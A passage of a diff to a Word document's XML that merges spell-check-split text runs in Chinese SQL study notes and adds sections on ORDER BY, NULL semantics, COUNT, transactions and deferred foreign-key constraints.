-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t xml:space="preserve">value condition expression) </w:t>
+      <w:r>
+        <w:t>例如：</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">  create domain valid_no as </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">  int constraint constraint_no </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">  check(</w:t>
+      </w:r>
+      <w:r>
+        <w:t>某一字段名</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">between 100 and 999) </w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -4187,35 +4045,6 @@
         <w:t xml:space="preserve">  </w:t>
       </w:r>
       <w:r>
-        <w:t>例如：</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t xml:space="preserve">  create domain valid_no as </w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t xml:space="preserve">  int constraint constraint_no </w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t xml:space="preserve">  check(</w:t>
-      </w:r>
-      <w:r>
-        <w:t>某一字段名</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">between 100 and 999) </w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t xml:space="preserve">  </w:t>
-      </w:r>
-      <w:r>
         <w:t>然后创建表时，使用</w:t>
       </w:r>
       <w:r>
@@ -4240,15 +4069,7 @@
     </w:p>
     <w:p>
       <w:r>
-        <w:t xml:space="preserve">         emp_name </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>varchar(</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t>10));</w:t>
+        <w:t xml:space="preserve">         emp_name varchar(10));</w:t>
       </w:r>
     </w:p>
     <w:p/>
@@ -4518,15 +4339,7 @@
     </w:p>
     <w:p>
       <w:r>
-        <w:t xml:space="preserve">  WHERE Grade&gt;</w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>=(</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t>SELECT AVG(Grade)</w:t>
+        <w:t xml:space="preserve">  WHERE Grade&gt;=(SELECT AVG(Grade)</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -4536,15 +4349,7 @@
     </w:p>
     <w:p>
       <w:r>
-        <w:t xml:space="preserve">                            WHERE </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>y.Sno=x.Sno</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t>);</w:t>
+        <w:t xml:space="preserve">                            WHERE y.Sno=x.Sno);</w:t>
       </w:r>
     </w:p>
     <w:p/>
@@ -4853,15 +4658,7 @@
     </w:p>
     <w:p>
       <w:r>
-        <w:t>SELECT c1 FROM tb WHERE c1 LIKE '%</w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>10!%</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t xml:space="preserve">-15!% off%' ESCAPE '!' ; </w:t>
+        <w:t xml:space="preserve">SELECT c1 FROM tb WHERE c1 LIKE '%10!%-15!% off%' ESCAPE '!' ; </w:t>
       </w:r>
       <w:r>
         <w:t>指定转义字符是</w:t>
@@ -4978,15 +4775,7 @@
       </w:r>
       <w:r>
         <w:tab/>
-        <w:t>(SELECT Sage FROM Student WHERE Sdept</w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>=‘</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t>CS’ ) AND Sdept &lt;&gt; ‘CS‘;</w:t>
+        <w:t>(SELECT Sage FROM Student WHERE Sdept=‘CS’ ) AND Sdept &lt;&gt; ‘CS‘;</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -5070,15 +4859,7 @@
     </w:p>
     <w:p>
       <w:r>
-        <w:t xml:space="preserve">  </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>( select</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> cno</w:t>
+        <w:t xml:space="preserve">  ( select cno</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -5146,15 +4927,7 @@
     <w:p/>
     <w:p>
       <w:r>
-        <w:t xml:space="preserve">select rowid from Courses where CourseId=CourseId and ClassId=ClassId and </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>ClassRemaining!=</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t xml:space="preserve">ClassRemaining;  </w:t>
+        <w:t xml:space="preserve">select rowid from Courses where CourseId=CourseId and ClassId=ClassId and ClassRemaining!=ClassRemaining;  </w:t>
       </w:r>
       <w:r>
         <w:t>这种语句如果放在不同名字的表中倒是可以联合查询，但是仅仅使用一个表，对自己进行判断只能依赖</w:t>
@@ -5186,15 +4959,7 @@
     </w:p>
     <w:p>
       <w:r>
-        <w:t xml:space="preserve">select rowid from Courses as T1 </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>where  exists</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> (select * from Courses as A  where T1.CourseId=A.CourseId and T1.TeachingDay=A.TeachingDay and T1.ClassId=A.ClassId and T1.ClassRemaining!=A.ClassRemaining) group by CourseId</w:t>
+        <w:t>select rowid from Courses as T1 where  exists (select * from Courses as A  where T1.CourseId=A.CourseId and T1.TeachingDay=A.TeachingDay and T1.ClassId=A.ClassId and T1.ClassRemaining!=A.ClassRemaining) group by CourseId</w:t>
       </w:r>
     </w:p>
     <w:p/>
@@ -5328,15 +5093,7 @@
     </w:p>
     <w:p>
       <w:r>
-        <w:t xml:space="preserve">  WHERE Sdept</w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>=‘</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t>MA’)</w:t>
+        <w:t xml:space="preserve">  WHERE Sdept=‘MA’)</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -5357,15 +5114,7 @@
     </w:p>
     <w:p>
       <w:r>
-        <w:t xml:space="preserve">  WHERE Cno</w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>=‘</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t>3’);</w:t>
+        <w:t xml:space="preserve">  WHERE Cno=‘3’);</w:t>
       </w:r>
     </w:p>
     <w:p/>
@@ -5458,15 +5207,7 @@
     </w:p>
     <w:p>
       <w:r>
-        <w:t xml:space="preserve">having </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>count(</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t>*) &gt; 1</w:t>
+        <w:t>having count(*) &gt; 1</w:t>
       </w:r>
     </w:p>
     <w:p/>
@@ -5736,15 +5477,7 @@
         <w:t>》</w:t>
       </w:r>
       <w:r>
-        <w:t>SELECT Student.*, SC.</w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>*  FROM</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> Student, SC WHERE Student.Sno=SC.Sno;</w:t>
+        <w:t>SELECT Student.*, SC.*  FROM Student, SC WHERE Student.Sno=SC.Sno;</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -5929,15 +5662,7 @@
     <w:p>
       <w:r>
         <w:tab/>
-        <w:t>using (A</w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>1,A</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t>2,....An)</w:t>
+        <w:t>using (A1,A2,....An)</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -6072,7 +5797,6 @@
     </w:p>
     <w:p>
       <w:r>
-        <w:lastRenderedPageBreak/>
         <w:t>唯一标识一条记录，不能有重复的，不允许为空</w:t>
       </w:r>
     </w:p>
@@ -6276,6 +6000,7 @@
     </w:p>
     <w:p>
       <w:r>
+        <w:lastRenderedPageBreak/>
         <w:t>2.</w:t>
       </w:r>
       <w:r>
@@ -6284,7 +6009,6 @@
     </w:p>
     <w:p>
       <w:r>
-        <w:lastRenderedPageBreak/>
         <w:t>注：这项原则对于那些经常需要在数据转换或多数据库合并时进行数据整理的数据并不适用。</w:t>
       </w:r>
     </w:p>
@@ -6316,28 +6040,12 @@
     </w:p>
     <w:p>
       <w:r>
-        <w:t xml:space="preserve">  sno </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>char(</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t>10),</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t xml:space="preserve">  cno </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>char(</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t>5),</w:t>
+        <w:t xml:space="preserve">  sno char(10),</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">  cno char(5),</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -6348,15 +6056,7 @@
     <w:p/>
     <w:p>
       <w:r>
-        <w:t xml:space="preserve">  primary </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>key(</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t>sno, cno),</w:t>
+        <w:t xml:space="preserve">  primary key(sno, cno),</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -6495,93 +6195,37 @@
     </w:p>
     <w:p>
       <w:r>
-        <w:t xml:space="preserve">| name         | </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>varchar(</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t>30)  | YES  |     | NULL    |                |</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t xml:space="preserve">| use_model    | </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>varchar(</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t>100) | YES  |     | NULL    |                |</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t xml:space="preserve">| url          | </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>varchar(</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t>200) | YES  |     | NULL    |                |</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t xml:space="preserve">| code         | </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>varchar(</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t>10)  | YES  |     | NULL    |                |</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t xml:space="preserve">| introduction | </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>varchar(</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t>400) | YES  |     | NULL    |                |</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t xml:space="preserve">| question1    | </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>varchar(</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t>400) | YES  |     | NULL    |                |</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t xml:space="preserve">| question2    | </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>varchar(</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t>400) | YES  |     | NULL    |                |</w:t>
+        <w:t>| name         | varchar(30)  | YES  |     | NULL    |                |</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>| use_model    | varchar(100) | YES  |     | NULL    |                |</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>| url          | varchar(200) | YES  |     | NULL    |                |</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>| code         | varchar(10)  | YES  |     | NULL    |                |</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>| introduction | varchar(400) | YES  |     | NULL    |                |</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>| question1    | varchar(400) | YES  |     | NULL    |                |</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>| question2    | varchar(400) | YES  |     | NULL    |                |</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -6591,6 +6235,7 @@
     </w:p>
     <w:p>
       <w:r>
+        <w:lastRenderedPageBreak/>
         <w:t>8 rows in set (0.00 sec)</w:t>
       </w:r>
     </w:p>
@@ -6602,7 +6247,6 @@
     </w:p>
     <w:p>
       <w:r>
-        <w:lastRenderedPageBreak/>
         <w:t>MySQL / SQL Server / Oracle / MS Access:</w:t>
       </w:r>
     </w:p>
@@ -6668,15 +6312,7 @@
     </w:p>
     <w:p>
       <w:r>
-        <w:t>ALTER TABLE Persons ADD CONSTRAINT pk_PersonID PRIMARY KEY (Id_</w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>P,LastName</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t>)</w:t>
+        <w:t>ALTER TABLE Persons ADD CONSTRAINT pk_PersonID PRIMARY KEY (Id_P,LastName)</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -6694,28 +6330,12 @@
     </w:p>
     <w:p>
       <w:r>
-        <w:t xml:space="preserve">   sno </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>char(</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t>5),</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t xml:space="preserve">   PRIMARY </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>KEY(</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t>sno)</w:t>
+        <w:t xml:space="preserve">   sno char(5),</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">   PRIMARY KEY(sno)</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -6810,15 +6430,7 @@
     </w:p>
     <w:p>
       <w:r>
-        <w:t xml:space="preserve">FOREIGN KEY (Id_P) REFERENCES </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>Persons(</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t xml:space="preserve">Id_P) </w:t>
+        <w:t xml:space="preserve">FOREIGN KEY (Id_P) REFERENCES Persons(Id_P) </w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -6838,40 +6450,19 @@
     <w:p/>
     <w:p>
       <w:r>
-        <w:t xml:space="preserve">CREATE TABLE </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>SC(</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:tab/>
-        <w:t xml:space="preserve">sno </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>char(</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t>5),</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:tab/>
-        <w:t xml:space="preserve">cno </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>char(</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t>5),</w:t>
+        <w:t>CREATE TABLE SC(</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:tab/>
+        <w:t>sno char(5),</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:tab/>
+        <w:t>cno char(5),</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -6917,6 +6508,7 @@
     </w:p>
     <w:p>
       <w:r>
+        <w:lastRenderedPageBreak/>
         <w:t>约束的名称可以通过约束名称查找到约束的内容，给约束起个名而已</w:t>
       </w:r>
       <w:r>
@@ -6952,7 +6544,6 @@
     </w:p>
     <w:p>
       <w:r>
-        <w:lastRenderedPageBreak/>
         <w:t>在数据库中使用约束</w:t>
       </w:r>
       <w:r>
@@ -7196,15 +6787,7 @@
     </w:p>
     <w:p>
       <w:r>
-        <w:t xml:space="preserve">FOREIGN KEY </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>( column</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t>_name [, ... ] ) REFERENCES reftable [ ( refcolumn [, ...] ) ]</w:t>
+        <w:t>FOREIGN KEY ( column_name [, ... ] ) REFERENCES reftable [ ( refcolumn [, ...] ) ]</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -7290,41 +6873,17 @@
     </w:p>
     <w:p>
       <w:r>
-        <w:t xml:space="preserve"> userId </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>INT(</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t>11) PRIMARY KEY   AUTO_INCREMENT,</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t xml:space="preserve"> username </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>CHAR(</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t>11) COMMENT 'phone',</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t xml:space="preserve"> password </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>VARCHAR(</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t>50) NOT NULL</w:t>
+        <w:t xml:space="preserve"> userId INT(11) PRIMARY KEY   AUTO_INCREMENT,</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve"> username CHAR(11) COMMENT 'phone',</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve"> password VARCHAR(50) NOT NULL</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -7431,7 +6990,11 @@
         <w:t>7.92</w:t>
       </w:r>
       <w:r>
-        <w:t>亿次，所以计算量要</w:t>
+        <w:t>亿次，所</w:t>
+      </w:r>
+      <w:r>
+        <w:lastRenderedPageBreak/>
+        <w:t>以计算量要</w:t>
       </w:r>
       <w:r>
         <w:t>1</w:t>
@@ -7446,7 +7009,6 @@
         <w:t>万次最坏查询到的次数为</w:t>
       </w:r>
       <w:r>
-        <w:lastRenderedPageBreak/>
         <w:t>Log2(1100,000)=24</w:t>
       </w:r>
       <w:r>
@@ -7475,30 +7037,14 @@
     <w:p/>
     <w:p>
       <w:r>
-        <w:t>insert into result set username='123</w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>',a</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t>1=2;</w:t>
-      </w:r>
-    </w:p>
-    <w:p/>
-    <w:p/>
-    <w:p>
-      <w:r>
-        <w:t xml:space="preserve">MariaDB [collage]&gt; insert into ITclass </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>values(</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t>'1','2','5','3','4','6','7');</w:t>
+        <w:t>insert into result set username='123',a1=2;</w:t>
+      </w:r>
+    </w:p>
+    <w:p/>
+    <w:p/>
+    <w:p>
+      <w:r>
+        <w:t>MariaDB [collage]&gt; insert into ITclass values('1','2','5','3','4','6','7');</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -7508,15 +7054,7 @@
     </w:p>
     <w:p>
       <w:r>
-        <w:t xml:space="preserve">MariaDB [collage]&gt; insert into ITclass </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>values(</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t>0,'1','2','5','3','4','6','7');</w:t>
+        <w:t>MariaDB [collage]&gt; insert into ITclass values(0,'1','2','5','3','4','6','7');</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -7527,15 +7065,7 @@
     <w:p/>
     <w:p>
       <w:r>
-        <w:t xml:space="preserve">MariaDB [collage]&gt; insert into ITclass </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>values(</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t>0,'1','2','5','3','4','6','7');</w:t>
+        <w:t>MariaDB [collage]&gt; insert into ITclass values(0,'1','2','5','3','4','6','7');</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -7573,15 +7103,7 @@
     <w:p/>
     <w:p>
       <w:r>
-        <w:t>insert into xx values(</w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>xx,xxx</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t>,NULL,xxx);</w:t>
+        <w:t>insert into xx values(xx,xxx,NULL,xxx);</w:t>
       </w:r>
     </w:p>
     <w:p/>
@@ -7592,15 +7114,7 @@
     </w:p>
     <w:p>
       <w:r>
-        <w:t>ERROR 1146 (42S02): Table '</w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>collage.ITclas</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t>' doesn't exist</w:t>
+        <w:t>ERROR 1146 (42S02): Table 'collage.ITclas' doesn't exist</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -7615,15 +7129,7 @@
     </w:p>
     <w:p>
       <w:r>
-        <w:t xml:space="preserve">| id | name | use_model | </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>url  |</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> code | introduction | question1 | question2 |</w:t>
+        <w:t>| id | name | use_model | url  | code | introduction | question1 | question2 |</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -7632,23 +7138,13 @@
       </w:r>
     </w:p>
     <w:p>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>|  1</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> | 1    | 2         | 5    | 3    | 4            | 6         | 7         |</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>|  2</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> | 1    | 2         | 5    | 3    | 4            | 6         | 7         |</w:t>
+      <w:r>
+        <w:t>|  1 | 1    | 2         | 5    | 3    | 4            | 6         | 7         |</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>|  2 | 1    | 2         | 5    | 3    | 4            | 6         | 7         |</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -7732,337 +7228,289 @@
     <w:p/>
     <w:p>
       <w:r>
+        <w:t xml:space="preserve">ORDER BY </w:t>
+      </w:r>
+      <w:r>
+        <w:t>子句可明确指定结果序。默认为升序</w:t>
+      </w:r>
+      <w:r>
+        <w:t>(ASC)</w:t>
+      </w:r>
+      <w:r>
+        <w:t>，</w:t>
+      </w:r>
+      <w:r>
+        <w:t>NULL</w:t>
+      </w:r>
+      <w:r>
+        <w:t>值在排序时被当作最大值。</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>如果取</w:t>
+      </w:r>
+      <w:r>
+        <w:t>“NULL</w:t>
+      </w:r>
+      <w:r>
+        <w:t>值</w:t>
+      </w:r>
+      <w:r>
+        <w:t>”</w:t>
+      </w:r>
+      <w:r>
+        <w:t>的字段出现在条件表达式中，将使条件计算为</w:t>
+      </w:r>
+      <w:r>
+        <w:t>NULL</w:t>
+      </w:r>
+      <w:r>
+        <w:t>，进而被排除于结果外。也就是说</w:t>
+      </w:r>
+      <w:r>
+        <w:t>xx=2</w:t>
+      </w:r>
+      <w:r>
+        <w:t>的结果会是一个</w:t>
+      </w:r>
+      <w:r>
+        <w:t>NULL</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>COUNT(*)</w:t>
+      </w:r>
+      <w:r>
+        <w:t>总是返回记录的个数</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">   COUNT(</w:t>
+      </w:r>
+      <w:r>
+        <w:t>字段</w:t>
+      </w:r>
+      <w:r>
+        <w:t>)</w:t>
+      </w:r>
+      <w:r>
+        <w:t>返回指定字段值非空的记录个数。</w:t>
+      </w:r>
+    </w:p>
+    <w:p/>
+    <w:p/>
+    <w:p/>
+    <w:p/>
+    <w:p>
+      <w:r>
+        <w:t>数据库事务：一个有限的数据库操作序列构成。</w:t>
+      </w:r>
+      <w:r>
+        <w:t>(</w:t>
+      </w:r>
+      <w:r>
+        <w:t>维基百科</w:t>
+      </w:r>
+      <w:r>
+        <w:t>)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:t>要么全部执行要要么全部不执行，比如说银行转账中涉及到的数据库操作。</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>BEGIN TRANSACTION</w:t>
+      </w:r>
+      <w:r>
+        <w:t>、</w:t>
+      </w:r>
+      <w:r>
+        <w:t>COMMIT</w:t>
+      </w:r>
+      <w:r>
+        <w:t>、</w:t>
+      </w:r>
+      <w:r>
+        <w:t>ROLLBACK</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>回滚</w:t>
+      </w:r>
+      <w:r>
+        <w:t>(Rollback)</w:t>
+      </w:r>
+      <w:r>
+        <w:t>：撤销指定</w:t>
+      </w:r>
+      <w:r>
+        <w:t>SQL</w:t>
+      </w:r>
+      <w:r>
+        <w:t>语句的处理过程。</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>提交</w:t>
+      </w:r>
+      <w:r>
+        <w:t>(Commit):</w:t>
+      </w:r>
+      <w:r>
+        <w:t>将还未保存的数据库语句写入数据库表。</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>保存点</w:t>
+      </w:r>
+      <w:r>
+        <w:t>(Savepoint):</w:t>
+      </w:r>
+      <w:r>
+        <w:t>事务集中的一个临时占位符，可进行回滚。</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>alter table department</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">  add constraint department_fk_mgr_ssn foreign key (mgr_ssn) references employee(ssn) initially deferred; </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>上面命令中的</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">initially deferred </w:t>
+      </w:r>
+      <w:r>
+        <w:t>表示将对检查的约束推迟到事务的最后。相反的是</w:t>
+      </w:r>
+      <w:r>
+        <w:t>initially immediate</w:t>
+      </w:r>
+      <w:r>
+        <w:t>。</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>begin;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>insert into department (dno, dept_name, mgr_ssn) values('101', 'HR', '10001');</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
